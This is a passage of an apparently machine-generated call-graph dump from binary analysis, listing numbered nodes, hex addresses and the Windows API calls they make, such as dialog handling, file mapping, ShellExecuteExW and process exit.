ca73c5 28532->28536 28537 c91a66 26 API calls 28533->28537 28534 c914a7 28 API calls 28534->28538 28535 ca72a7 28539 ca067e 6 API calls 28535->28539 28540 c91a66 26 API calls 28536->28540 28537->28507 28538->28534 28541 ca229d 45 API calls 28538->28541 28547 c91a66 26 API calls 28538->28547 28551 c9ed1f 49 API calls 28538->28551 28557 ca7292 28538->28557 28542 ca72ac 28539->28542 28543 ca73cd 28540->28543 28541->28538 28544 ca7332 28542->28544 28545 ca72b3 28542->28545 28546 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28543->28546 28549 ca6a25 53 API calls 28544->28549 28548 ca6c5e 30 API calls 28545->28548 28550 ca73e8 28546->28550 28547->28538 28552 ca72bd 28548->28552 28553 ca735b AllocConsole 28549->28553 28550->28337 28551->28538 28554 ca6c5e 30 API calls 28552->28554 28555 ca7368 GetCurrentProcessId AttachConsole 28553->28555 28568 ca7310 28553->28568 28558 ca72c7 28554->28558 28556 ca7383 28555->28556 28563 ca738c GetStdHandle WriteConsoleW Sleep FreeConsole 28556->28563 28557->28527 28557->28528 28559 ca4318 53 API calls 28558->28559 28560 ca72ec 28559->28560 28562 ca6a25 53 API calls 28560->28562 28561 ca73b5 ExitProcess 28564 ca72f6 28562->28564 28563->28568 28565 ca4318 53 API calls 28564->28565 28566 ca7307 28565->28566 28567 c914a7 28 API calls 28566->28567 28567->28568 28568->28561 28570 ca6c5e 30 API calls 28569->28570 28571 caf4e8 OleInitialize 28570->28571 28572 caf50b GdiplusStartup SHGetMalloc 28571->28572 28572->28340 28574 c925a4 26 API calls 28573->28574 28575 caf8a8 28574->28575 28576 c925a4 26 API calls 28575->28576 28577 caf8b4 28576->28577 28578 c925a4 26 API calls 28577->28578 28579 caf8c0 28578->28579 28580 c925a4 26 API calls 28579->28580 28581 caf8cc 28580->28581 28581->28342 28581->28581 28583 c91a66 26 API calls 28582->28583 28584 caf857 28583->28584 28585 c91a66 26 API calls 28584->28585 28586 caf85f 28585->28586 28587 c91a66 26 API calls 28586->28587 28588 caf867 28587->28588 28590 ca6d8d GetModuleHandleW 28589->28590 28590->28490 28590->28491 28592 ca1405 __EH_prolog3 28591->28592 28593 cb56f6 28 API calls 28592->28593 28595 ca140f 28593->28595 28594 ca1431 GetModuleFileNameW 28594->28595 28596 ca1463 28594->28596 28595->28594 28595->28596 28643 c91be3 28595->28643 28598 c914a7 28 API calls 28596->28598 28599 ca146c 28598->28599 28600 ca147f 28599->28600 28601 c912a7 26 API calls 28599->28601 28600->28499 28601->28600 28603 ca2124 28602->28603 28604 c9769f 45 API calls 28603->28604 28605 ca2136 28604->28605 28605->28523 28607 ca06a4 GetVersionExW 28606->28607 28608 ca06d1 28606->28608 28607->28608 28609 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28608->28609 28610 ca06fa 28609->28610 28610->28523 28612 ca6c6a __EH_prolog3_GS 28611->28612 28613 cb56f6 28 API calls 28612->28613 28614 ca6c77 28613->28614 28615 ca6c8d GetSystemDirectoryW 28614->28615 28616 ca6cab 28615->28616 28633 ca6ca4 28615->28633 28617 c914a7 28 API calls 28616->28617 28618 ca6ccd 28617->28618 28621 c914a7 28 API calls 28618->28621 28619 ca6d71 28620 cb5787 5 API calls 28619->28620 28623 ca6d78 28620->28623 28624 ca6cda 28621->28624 28622 c912a7 26 API calls 28622->28619 28623->28523 28648 ca1ad1 28624->28648 28627 c91a66 26 API calls 28628 ca6cf7 28627->28628 28629 c91a66 26 API calls 28628->28629 28630 ca6cff LoadLibraryW 28629->28630 28632 ca6d1c 28630->28632 28630->28633 28632->28633 28658 c919a9 26 API calls 28632->28658 28633->28619 28633->28622 28636 ca22a6 28635->28636 28660 ca236c 28636->28660 28639->28498 28640->28524 28641->28535 28642->28518 28644 c91c03 28643->28644 28645 c91bfb 28643->28645 28644->28645 28647 c91c33 28 API calls 28644->28647 28645->28595 28647->28645 28649 ca1add __EH_prolog3_GS 28648->28649 28650 c97673 28 API calls 28649->28650 28651 ca1aef 28650->28651 28652 ca1b0c 28651->28652 28659 ca0ddb 28 API calls 28651->28659 28654 c91a66 26 API calls 28652->28654 28655 ca1b35 28654->28655 28656 cb5787 5 API calls 28655->28656 28657 ca1b3a 28656->28657 28657->28627 28658->28633 28659->28652 28661 ca2378 28660->28661 28664 ca238e 28661->28664 28663 ca22b6 28663->28523 28665 ca24e5 28664->28665 28668 ca23a4 28664->28668 28672 c958cb 45 API calls 28665->28672 28670 ca23bc 28668->28670 28671 ca0c7f 28 API calls 28668->28671 28670->28663 28671->28670 28674 cbeb9d _abort 28673->28674 28675 cbebb6 28674->28675 28676 cbeba4 28674->28676 28697 cc18e1 EnterCriticalSection 28675->28697 28709 cbeceb GetModuleHandleW 28676->28709 28679 cbeba9 28679->28675 28710 cbed2f GetModuleHandleExW 28679->28710 28684 cbebbd 28694 cbec32 28684->28694 28696 cbec5b 28684->28696 28718 cbf6a0 20 API calls _abort 28684->28718 28685 cbec4a 28691 cbf951 _abort 5 API calls 28685->28691 28686 cbec78 28701 cbecaa 28686->28701 28687 cbeca4 28719 cc8fc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28687->28719 28690 cbf951 _abort 5 API calls 28690->28685 28691->28696 28694->28685 28694->28690 28698 cbec9b 28696->28698 28697->28684 28720 cc1931 LeaveCriticalSection 28698->28720 28700 cbec74 28700->28686 28700->28687 28721 cc1d26 28701->28721 28704 cbecd8 28707 cbed2f _abort 8 API calls 28704->28707 28705 cbecb8 GetPEB 28705->28704 28706 cbecc8 GetCurrentProcess TerminateProcess 28705->28706 28706->28704 28708 cbece0 ExitProcess 28707->28708 28709->28679 28711 cbed59 GetProcAddress 28710->28711 28712 cbed7c 28710->28712 28713 cbed6e 28711->28713 28714 cbed8b 28712->28714 28715 cbed82 FreeLibrary 28712->28715 28713->28712 28716 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28714->28716 28715->28714 28717 cbebb5 28716->28717 28717->28675 28718->28694 28720->28700 28722 cc1d4b 28721->28722 28723 cc1d41 28721->28723 28728 cc1948 5 API calls _abort 28722->28728 28725 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28723->28725 28726 cbecb4 28725->28726 28726->28704 28726->28705 28727 cc1d62 28727->28723 28728->28727 28732 cb5680 28733 cb5696 _com_error::_com_error 28732->28733 28734 cb734a _com_raise_error RaiseException 28733->28734 28735 cb56a4 28734->28735 28736 cb4fce ___delayLoadHelper2@8 17 API calls 28735->28736 28737 cb56bc 28736->28737 28738 cb0900 28739 cb090f __EH_prolog3_catch_GS 28738->28739 28984 c91e44 28739->28984 28742 cb125b 29090 cb3796 28742->29090 28743 cb0940 28747 cb0951 28743->28747 28748 cb0a20 28743->28748 28788 cb095f 28743->28788 28752 cb095a 28747->28752 28753 cb09fc 28747->28753 28754 cb0ab0 28748->28754 28759 cb0a36 28748->28759 28750 cb127b SendMessageW 28751 cb128a 28750->28751 28755 cb12a3 GetDlgItem SendMessageW 28751->28755 28756 cb1293 SendDlgItemMessageW 28751->28756 28762 ca4318 53 API calls 28752->28762 28752->28788 28758 cb0a15 EndDialog 28753->28758 28753->28788 28994 c91ce2 28754->28994 28761 ca1309 30 API calls 28755->28761 28756->28755 28758->28788 28760 ca4318 53 API calls 28759->28760 28764 cb0a53 SetDlgItemTextW 28760->28764 28765 cb12e3 GetDlgItem 28761->28765 28766 cb098d 28762->28766 28768 cb0a5f 28764->28768 28769 cb1302 28765->28769 29135 c91900 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28766->29135 28767 cb0b01 GetDlgItem 28771 cb0b38 SetFocus 28767->28771 28772 cb0b15 SendMessageW SendMessageW 28767->28772 28776 cb0a68 GetMessageW 28768->28776 28768->28788 29109 c91e05 28769->29109 28777 cb0b48 28771->28777 28778 cb0b6f 28771->28778 28772->28771 28774 cb0994 28780 cb09a4 28774->28780 28787 c91de7 SetDlgItemTextW 28774->28787 28782 cb0a7f IsDialogMessageW 28776->28782 28776->28788 28784 ca4318 53 API calls 28777->28784 28786 c97673 28 API calls 28778->28786 28779 cb130c 29112 caf2ce GetClassNameW 28779->29112 28780->28788 29136 c919a9 26 API calls 28780->29136 28781 cb0ae4 28792 c91a66 26 API calls 28781->28792 28782->28768 28789 cb0a8e TranslateMessage DispatchMessageW 28782->28789 28783 cb113a 28790 ca4318 53 API calls 28783->28790 28791 cb0b52 28784->28791 28794 cb0b7b 28786->28794 28787->28780 29137 cb5796 28788->29137 28789->28768 28796 cb114b SetDlgItemTextW 28790->28796 28797 c914a7 28 API calls 28791->28797 28792->28788 29154 cb34eb 28 API calls __EH_prolog3_GS 28794->29154 28801 cb1160 28796->28801 28802 cb0b5b 28797->28802 28800 cb0b88 28806 ca4318 53 API calls 28800->28806 28807 ca4318 53 API calls 28801->28807 29140 cb3572 28802->29140 28805 cb1346 28811 cb1377 28805->28811 28814 ca4318 53 API calls 28805->28814 28810 cb0b9f 28806->28810 28812 cb117e 28807->28812 28808 cb0b6a 28815 c91a66 26 API calls 28808->28815 28809 cb1d4f 48 API calls 28809->28805 28813 ca6a25 53 API calls 28810->28813 28820 cb1d4f 48 API calls 28811->28820 28918 cb1490 28811->28918 28816 c914a7 28 API calls 28812->28816 28818 cb0ba9 28813->28818 28819 cb1359 SetDlgItemTextW 28814->28819 28821 cb0bce 28815->28821 28822 cb1187 28816->28822 28817 cb1595 28829 cb15ad 28817->28829 28830 cb15a0 EnableWindow 28817->28830 28823 cb3572 21 API calls 28818->28823 28824 ca4318 53 API calls 28819->28824 28825 cb138d 28820->28825 28826 cb0be0 28821->28826 29155 cb3d64 26 API calls __EH_prolog3_GS 28821->29155 28827 cb11f5 28822->28827 28836 c914a7 28 API calls 28822->28836 28831 cb0bbb 28823->28831 28832 cb136d SetDlgItemTextW 28824->28832 28841 cb13ad 28825->28841 28869 cb13ce 28825->28869 28828 cb0c07 28826->28828 28844 c9ed0d 49 API calls 28826->28844 28834 ca4318 53 API calls 28827->28834 29008 c9eaf3 28828->29008 28839 cb15c8 28829->28839 29172 c91cc4 GetDlgItem KiUserCallbackDispatcher 28829->29172 28830->28829 28840 c91a66 26 API calls 28831->28840 28832->28811 28835 cb11ff 28834->28835 28842 c914a7 28 API calls 28835->28842 28843 cb11a6 28836->28843 28837 cb147c 28845 cb1d4f 48 API calls 28837->28845 28849 cb15f0 28839->28849 28860 cb15e8 SendMessageW 28839->28860 28840->28808 29169 cae265 34 API calls __EH_prolog3_GS 28841->29169 28850 cb120b 28842->28850 28853 ca4318 53 API calls 28843->28853 28854 cb0bfd 28844->28854 28845->28918 28848 cb1560 29171 cae265 34 API calls __EH_prolog3_GS 28848->29171 28849->28781 28861 ca4318 53 API calls 28849->28861 28865 c914a7 28 API calls 28850->28865 28851 cb15bf 29173 c91cc4 GetDlgItem KiUserCallbackDispatcher 28851->29173 28878 cb11b6 28853->28878 28854->28828 28862 cb0c01 28854->28862 28855 cb0c20 GetLastError 28856 cb0c2b 28855->28856 29018 ca2226 28856->29018 28860->28849 28867 cb1609 SetDlgItemTextW 28861->28867 29156 cafa79 25 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28862->29156 28864 cb1587 28873 c91a66 26 API calls 28864->28873 28874 cb1224 28865->28874 28866 c914a7 28 API calls 28866->28918 28867->28781 28869->28837 28875 cb1d4f 48 API calls 28869->28875 28870 cb0c40 28871 cb0c4c GetLastError 28870->28871 28872 cb0c5d 28870->28872 28871->28872 28880 cb0c79 GetTickCount 28872->28880 28881 cb0d0f 28872->28881 28945 cb0cfd 28872->28945 28876 cb1593 28873->28876 28885 c91a66 26 API calls 28874->28885 28879 cb1405 28875->28879 28876->28817 28877 ca4318 53 API calls 28877->28918 28895 c91a66 26 API calls 28878->28895 28879->28837 28883 cb140e DialogBoxParamW 28879->28883 29021 c9325c 28880->29021 28887 cb0f94 28881->28887 28894 ca13f9 29 API calls 28881->28894 28882 cb1046 29053 c91e1f GetDlgItem ShowWindow 28882->29053 28883->28837 28888 cb142c EndDialog 28883->28888 28890 cb1243 28885->28890 28892 cb0acb EndDialog 28887->28892 29167 c99733 28 API calls _wcslen 28887->29167 28888->28788 28896 cb1448 28888->28896 28898 c91a66 26 API calls 28890->28898 28891 cb105b 29054 c91e1f GetDlgItem ShowWindow 28891->29054 28892->28781 28901 cb0d39 28894->28901 28902 cb11e9 28895->28902 28896->28788 29170 c919a9 26 API calls 28896->29170 28904 cb124e 28898->28904 28900 cb0fae 28915 ca4318 53 API calls 28900->28915 29157 ca505a 114 API calls 28901->29157 28907 c91a66 26 API calls 28902->28907 28903 cb0c9f 28909 c91a66 26 API calls 28903->28909 28910 c91a66 26 API calls 28904->28910 28905 cb1064 28911 ca4318 53 API calls 28905->28911 28907->28827 28913 cb0cab 28909->28913 28910->28781 28914 cb106e SetDlgItemTextW 28911->28914 28912 cb0d51 28919 ca6a25 53 API calls 28912->28919 29031 c9de9a 28913->29031 29055 c91e1f GetDlgItem ShowWindow 28914->29055 28917 cb0fd4 28915->28917 28928 c91a66 26 API calls 28917->28928 28918->28817 28918->28848 28918->28866 28918->28877 28921 c91a66 26 API calls 28918->28921 28922 cb0d80 GetCommandLineW 28919->28922 28920 cb1082 SetDlgItemTextW GetDlgItem 28924 cb109f GetWindowLongW SetWindowLongW 28920->28924 28925 cb10b7 28920->28925 28921->28918 28940 cb0e05 _wcslen 28922->28940 28924->28925 29056 cb1d4f 28925->29056 28932 cb0fea 28928->28932 28929 cb0ce0 29044 c9ddc7 28929->29044 28930 cb0cd5 GetLastError 28930->28929 28936 c91a66 26 API calls 28932->28936 28935 cb1d4f 48 API calls 28938 cb10ce 28935->28938 28939 cb0ff6 28936->28939 29076 cb3c78 28938->29076 28949 ca4318 53 API calls 28939->28949 29158 cb0405 5 API calls 2 library calls 28940->29158 28942 c91a66 26 API calls 28942->28945 28944 cb0e23 29159 cb0405 5 API calls 2 library calls 28944->29159 28945->28881 28945->28882 28948 cb1d4f 48 API calls 28960 cb10ef 28948->28960 28950 cb100c 28949->28950 28952 c914a7 28 API calls 28950->28952 28951 cb0e2f 29160 cb0405 5 API calls 2 library calls 28951->29160 28956 cb1015 28952->28956 28954 cb1110 29168 c91cc4 GetDlgItem KiUserCallbackDispatcher 28954->29168 28963 c91a66 26 API calls 28956->28963 28957 cb0e3b 29161 ca5109 114 API calls 28957->29161 28958 cb0af5 28958->28783 28958->28892 28960->28954 28962 cb1d4f 48 API calls 28960->28962 28961 cb0e4e 29162 cb3e53 28 API calls __EH_prolog3 28961->29162 28962->28954 28965 cb1031 28963->28965 28967 c91a66 26 API calls 28965->28967 28966 cb0e6b CreateFileMappingW 28968 cb0e9d MapViewOfFile 28966->28968 28969 cb0ed5 ShellExecuteExW 28966->28969 28967->28892 28970 cb0ed2 __InternalCxxFrameHandler 28968->28970 28971 cb0ef3 28969->28971 28970->28969 28972 cb0f3d 28971->28972 28973 cb0f00 WaitForInputIdle 28971->28973 28976 cb0f73 28972->28976 28977 cb0f60 UnmapViewOfFile CloseHandle 28972->28977 28974 cb0f1e 28973->28974 28974->28972 28975 cb0f23 Sleep 28974->28975 28975->28972 28975->28974 29163 c92e8b 28976->29163 28977->28976 28980 c91a66 26 API calls 28981 cb0f83 28980->28981 28982 c91a66 26 API calls 28981->28982 28983 cb0f8e 28982->28983 28983->28887 28985 c91e4d 28984->28985 28986 c91ea6 28984->28986 28987 c91eb3 28985->28987 29174 ca3eaa 64 API calls 3 library calls 28985->29174 29175 ca3e83 GetWindowLongW SetWindowLongW 28986->29175 28987->28742 28987->28743 28987->28788 28990 c91e6f 28990->28987 28991 c91e82 GetDlgItem 28990->28991 28991->28987 28992 c91e92 28991->28992 28992->28987 28993 c91e98 SetWindowTextW 28992->28993 28993->28987 29176 cb57d8 28994->29176 28996 c91cee GetDlgItem 28997 c91d0b 28996->28997 28998 c91d1d 28996->28998 29000 c914a7 28 API calls 28997->29000 29177 c91d64 28998->29177 29001 c91d18 29000->29001 29002 c91d4d 29001->29002 29003 c91a66 26 API calls 29001->29003 29004 c91d5a 29002->29004 29005 c91a66 26 API calls 29002->29005 29003->29002 29006 cb5787 5 API calls 29004->29006 29005->29004 29007 c91d61 29006->29007 29007->28767 29007->28892 29007->28958 29015 c9eaff __EH_prolog3_GS 29008->29015 29009 cb5787 5 API calls 29010 c9ebb6 29009->29010 29010->28855 29010->28856 29011 c9eb84 29012 c9efef 54 API calls 29011->29012 29014 c9eb09 29011->29014 29012->29014 29013 c9769f 45 API calls 29013->29015 29014->29009 29015->29011 29015->29013 29015->29014 29017 c91a66 26 API calls 29015->29017 29190 c9efef 29015->29190 29017->29015 29019 ca2232 SetCurrentDirectoryW 29018->29019 29020 ca2230 29018->29020 29019->28870 29020->29019 29022 c93280 29021->29022 29224 c92f0f 29022->29224 29025 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29026 c9329d 29025->29026 29027 c92f45 29026->29027 29028 c92f55 _wcslen 29027->29028 29228 c95962 29028->29228 29030 c92f63 29030->28903 29034 c9dea6 __EH_prolog3_GS 29031->29034 29032 c9def4 29035 c9df9e 29032->29035 29036 ca169a 47 API calls 29032->29036 29033 c9df09 CreateFileW 29033->29032 29034->29032 29034->29033 29038 cb5787 5 API calls 29035->29038 29037 c9df49 29036->29037 29039 c9df6e 29037->29039 29041 c9df59 CreateFileW 29037->29041 29042 c9df56 29037->29042 29040 c9dfdf 29038->29040 29039->29035 29237 c919a9 26 API calls 29039->29237 29040->28929 29040->28930 29041->29039 29042->29041 29045 c9ddf8 29044->29045 29046 c9de09 29044->29046 29045->29046 29048 c9de0b 29045->29048 29049 c9de04 29045->29049 29047 c91a66 26 API calls 29046->29047 29050 c9de18 29047->29050 29243 c9de50 29048->29243 29238 c9dfe2 29049->29238 29050->28942 29053->28891 29054->28905 29055->28920 29074 cb1d5e __EH_prolog3_GS 29056->29074 29058 cb349a 29059 c91a66 26 API calls 29058->29059 29060 cb34a5 29059->29060 29061 cb5787 5 API calls 29060->29061 29062 cb10c5 29061->29062 29062->28935 29063 c9769f 45 API calls 29063->29074 29064 c925a4 26 API calls 29064->29074 29066 c914a7 28 API calls 29066->29074 29067 c91a66 26 API calls 29067->29074 29068 ca645a 28 API calls 29068->29074 29071 cb34ad 29269 c958cb 45 API calls 29071->29269 29074->29058 29074->29063 29074->29064 29074->29066 29074->29067 29074->29068 29074->29071 29264 ca62cd 30 API calls 2 library calls 29074->29264 29265 caf5b2 28 API calls 29074->29265 29266 c9adaa CompareStringW 29074->29266 29267 cb44c0 26 API calls 29074->29267 29268 cb030a 28 API calls 29074->29268 29077 cb3c87 __EH_prolog3_catch_GS _wcslen 29076->29077 29270 ca6a89 29077->29270 29079 cb3cba 29274 c97903 29079->29274 29088 cb5796 5 API calls 29089 cb10e0 29088->29089 29089->28948 30122 caeaa6 29090->30122 29093 cb37bf GetWindow 29094 cb3885 29093->29094 29099 cb37d8 29093->29099 29095 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29094->29095 29096 cb1266 29095->29096 29096->28750 29096->28751 29097 cb37e5 GetClassNameW 30127 ca8da4 CompareStringW 29097->30127 29099->29094 29099->29097 29100 cb3809 GetWindowLongW 29099->29100 29101 cb386d GetWindow 29099->29101 29100->29101 29102 cb3819 SendMessageW 29100->29102 29101->29094 29101->29099 29102->29101 29103 cb382f GetObjectW 29102->29103 30128 caeae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29103->30128 29105 cb3846 30129 caeac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29105->30129 30130 caef21 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29105->30130 29108 cb3857 SendMessageW DeleteObject 29108->29101 29110 c91e0f 29109->29110 29111 c91e11 SetWindowTextW 29109->29111 29110->29111 29111->28779 29113 caf2f9 29112->29113 29114 caf31e 29112->29114 30133 ca8da4 CompareStringW 29113->30133 29117 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29114->29117 29116 caf30c 29116->29114 29118 caf310 FindWindowExW 29116->29118 29119 caf337 29117->29119 29118->29114 29120 cafdd1 29119->29120 29121 cafded 29120->29121 29122 c920b0 30 API calls 29121->29122 29123 cafe27 29122->29123 30134 c92dbb 29123->30134 29126 cafe4c 30141 c9278b 29126->30141 29127 cafe43 29128 c9232c 123 API calls 29127->29128 29131 cafe48 29128->29131 29133 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29131->29133 29132 c9232c 123 API calls 29132->29131 29134 cafe77 29133->29134 29134->28805 29134->28809 29135->28774 29136->28788 29138 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29137->29138 29139 cb57a0 29138->29139 29139->29139 29141 cb0678 5 API calls 29140->29141 29142 cb358d GetDlgItem 29141->29142 29143 cb35e4 SendMessageW SendMessageW 29142->29143 29144 cb35ac 29142->29144 29145 cb3643 SendMessageW 29143->29145 29146 cb3624 29143->29146 29147 cb35b7 ShowWindow SendMessageW SendMessageW 29144->29147 29148 cb365b 29145->29148 29149 cb365d SendMessageW SendMessageW 29145->29149 29146->29145 29147->29143 29148->29149 29150 cb367f SendMessageW 29149->29150 29151 cb36a2 SendMessageW 29149->29151 29150->29151 29152 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29151->29152 29153 cb36c0 29152->29153 29153->28808 29154->28800 29155->28826 29156->28828 29157->28912 29158->28944 29159->28951 29160->28957 29161->28961 29162->28966 29164 c92ea0 29163->29164 29165 c92e93 29163->29165 29164->28980 29166 c912a7 26 API calls 29165->29166 29166->29164 29167->28900 29168->28958 29169->28869 29170->28837 29171->28864 29172->28851 29173->28839 29174->28990 29175->28987 29176->28996 29188 cb57d8 29177->29188 29179 c91d70 GetWindowTextLengthW 29189 c91bbd 28 API calls 29179->29189 29181 c91dab GetWindowTextW 29182 c914a7 28 API calls 29181->29182 29183 c91dca 29182->29183 29184 c91ddd 29183->29184 29185 c912a7 26 API calls 29183->29185 29186 cb5787 5 API calls 29184->29186 29185->29184 29187 c91de4 29186->29187 29187->29001 29188->29179 29189->29181 29191 c9effb __EH_prolog3_GS 29190->29191 29192 c9f02f 29191->29192 29193 c9f01b CreateDirectoryW 29191->29193 29194 c9ed0d 49 API calls 29192->29194 29193->29192 29195 c9f0d0 29193->29195 29196 c9f03b 29194->29196 29197 c9f0df 29195->29197 29209 c9f58b 29195->29209 29198 c9f0e3 GetLastError 29196->29198 29200 ca169a 47 API calls 29196->29200 29202 cb5787 5 API calls 29197->29202 29198->29197 29201 c9f063 29200->29201 29203 c9f07d 29201->29203 29205 c9f070 29201->29205 29206 c9f073 CreateDirectoryW 29201->29206 29204 c9f100 29202->29204 29208 c9f0ad 29203->29208 29222 c919a9 26 API calls 29203->29222 29204->29015 29205->29206 29206->29203 29208->29195 29208->29198 29210 c9f597 __EH_prolog3_GS 29209->29210 29211 c9f5a4 SetFileAttributesW 29210->29211 29212 c9f5b7 29211->29212 29220 c9f622 29211->29220 29214 ca169a 47 API calls 29212->29214 29213 cb5787 5 API calls 29215 c9f638 29213->29215 29216 c9f5d7 29214->29216 29215->29197 29217 c9f5f6 29216->29217 29218 c9f5e4 29216->29218 29219 c9f5e7 SetFileAttributesW 29216->29219 29217->29220 29223 c919a9 26 API calls 29217->29223 29218->29219 29219->29217 29220->29213 29222->29208 29223->29220 29225 c92f2f 29224->29225 29226 c92f26 29224->29226 29227 c9120c 28 API calls 29225->29227 29226->29025 29227->29226 29229 c95a3a 29228->29229 29230 c95975 29228->29230 29236 c958cb 45 API calls 29229->29236 29234 c95987 29230->29234 29235 c93029 28 API calls 29230->29235 29234->29030 29235->29234 29237->29035 29239 c9dfeb 29238->29239 29240 c9e015 29238->29240 29239->29240 29249 c9ec63 29239->29249 29240->29046 29244 c9de76 29243->29244 29245 c9de5c 29243->29245 29246 c9de95 29244->29246 29263 c9925b 109 API calls 29244->29263 29245->29244 29247 c9de68 CloseHandle 29245->29247 29246->29046 29247->29244 29250 c9ec6f __EH_prolog3_GS 29249->29250 29251 c9ec7c DeleteFileW 29250->29251 29252 c9ec8c 29251->29252 29253 c9ecf4 29251->29253 29255 ca169a 47 API calls 29252->29255 29254 cb5787 5 API calls 29253->29254 29256 c9e013 29254->29256 29257 c9ecac 29255->29257 29256->29046 29258 c9ecb9 29257->29258 29259 c9ecbc DeleteFileW 29257->29259 29260 c9ecc8 29257->29260 29258->29259 29259->29260 29260->29253 29262 c919a9 26 API calls 29260->29262 29262->29253 29263->29246 29264->29074 29265->29074 29266->29074 29267->29074 29268->29074 29271 ca6a99 _wcslen 29270->29271 29272 c91be3 28 API calls 29271->29272 29273 ca6abb 29272->29273 29273->29079 29275 ca6a74 29274->29275 29276 ca6a89 28 API calls 29275->29276 29277 ca6a86 29276->29277 29278 c9b03d 29277->29278 29279 c9b049 __EH_prolog3_GS 29278->29279 29325 ca2815 29279->29325 29281 c9b092 29331 c9b231 29281->29331 29284 c91a66 26 API calls 29285 c9b120 29284->29285 29286 c91a66 26 API calls 29285->29286 29287 c9b128 29286->29287 29288 cb56f6 28 API calls 29287->29288 29289 c9b13f 29288->29289 29336 caa599 29289->29336 29291 c9b172 29292 cb5787 5 API calls 29291->29292 29293 c9b179 29292->29293 29294 c9b3e1 29293->29294 29295 c9b3ed __EH_prolog3_GS 29294->29295 29296 c9b478 29295->29296 29299 c9b484 29295->29299 29376 c9f711 29295->29376 29298 c91a66 26 API calls 29296->29298 29298->29299 29304 c9b4e0 29299->29304 29343 c9bc65 29299->29343 29300 c9b529 29302 cb5787 5 API calls 29300->29302 29303 c9b543 29302->29303 29306 c9b194 29303->29306 29304->29300 29383 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29304->29383 30066 c9d6bc 29306->30066 29309 c91a66 26 API calls 29311 c9b1e8 29309->29311 29313 c91a66 26 API calls 29311->29313 29312 c9b1d0 29312->29309 29314 c9b1f3 29313->29314 29315 c91a66 26 API calls 29314->29315 29316 c9b1fe 29315->29316 30080 ca28aa 29316->30080 29318 c9b206 29319 c91a66 26 API calls 29318->29319 29320 c9b20e 29319->29320 29321 c91a66 26 API calls 29320->29321 29322 c9b216 29321->29322 29323 c9d869 26 API calls 29322->29323 29324 c9b21d 29323->29324 29324->29088 29326 ca2821 __EH_prolog3 29325->29326 29327 cb56f6 28 API calls 29326->29327 29328 ca285f 29327->29328 29329 cb56f6 28 API calls 29328->29329 29330 ca2883 29329->29330 29330->29281 29332 c925a4 26 API calls 29331->29332 29333 c9b23f 29332->29333 29334 c925a4 26 API calls 29333->29334 29335 c9b118 29334->29335 29335->29284 29337 caa5a5 __EH_prolog3 29336->29337 29338 cb56f6 28 API calls 29337->29338 29339 caa5bf 29338->29339 29340 caa5d6 29339->29340 29342 ca7445 112 API calls 29339->29342 29340->29291 29342->29340 29344 c9bc80 29343->29344 29384 c920b0 29344->29384 29346 c9bca7 29347 c9bcba 29346->29347 29606 c9e910 29346->29606 29352 c9bcec 29347->29352 29394 c927e0 29347->29394 29350 c9bce8 29350->29352 29418 c92d41 160 API calls __EH_prolog3_GS 29350->29418 29583 c9232c 29352->29583 29357 c9be08 29419 c9bec2 7 API calls 29357->29419 29358 c9bd14 29358->29357 29360 c97673 28 API calls 29358->29360 29361 c9bd36 29360->29361 29610 ca1e54 46 API calls 2 library calls 29361->29610 29363 c9f711 53 API calls 29372 c9bd53 29363->29372 29364 c9be16 29365 c9be76 29364->29365 29420 ca864f 29364->29420 29365->29352 29423 c952d8 29365->29423 29435 c9bf3d 29365->29435 29366 c9bde8 29370 c91a66 26 API calls 29366->29370 29369 c91a66 26 API calls 29369->29372 29373 c9bded 29370->29373 29372->29363 29372->29366 29372->29369 29611 ca1e54 46 API calls 2 library calls 29372->29611 29375 c91a66 26 API calls 29373->29375 29375->29357 29377 ca1a9f 5 API calls 29376->29377 29379 c9f723 29377->29379 29378 c9f74b 29378->29295 29379->29378 30041 c9f826 29379->30041 29382 c9f738 FindClose 29382->29378 29383->29300 29385 c920bc __EH_prolog3 29384->29385 29386 ca2815 28 API calls 29385->29386 29387 c920e8 29386->29387 29388 cb56f6 28 API calls 29387->29388 29392 c92193 29387->29392 29390 c92180 29388->29390 29390->29392 29612 c976e7 29390->29612 29620 ca026f 29392->29620 29393 c92227 _abort 29393->29346 29395 c927ec __EH_prolog3 29394->29395 29396 c911dd 28 API calls 29395->29396 29400 c92838 29395->29400 29406 c9298b 29395->29406 29401 c92882 29396->29401 29397 c929a9 29649 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29397->29649 29399 c952d8 133 API calls 29405 c929f4 29399->29405 29400->29397 29402 c929b6 29400->29402 29416 c9e850 111 API calls 29401->29416 29402->29399 29402->29406 29403 c92a3c 29403->29406 29411 c92a6f 29403->29411 29650 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29403->29650 29405->29403 29407 c952d8 133 API calls 29405->29407 29406->29350 29407->29405 29408 c92995 29410 c92e8b 26 API calls 29408->29410 29409 c92986 29412 c92e8b 26 API calls 29409->29412 29410->29400 29411->29406 29417 c9e850 111 API calls 29411->29417 29412->29406 29413 c928ad 29413->29408 29413->29409 29414 c952d8 133 API calls 29415 c92ac0 29414->29415 29415->29406 29415->29414 29416->29413 29417->29415 29418->29358 29419->29364 29651 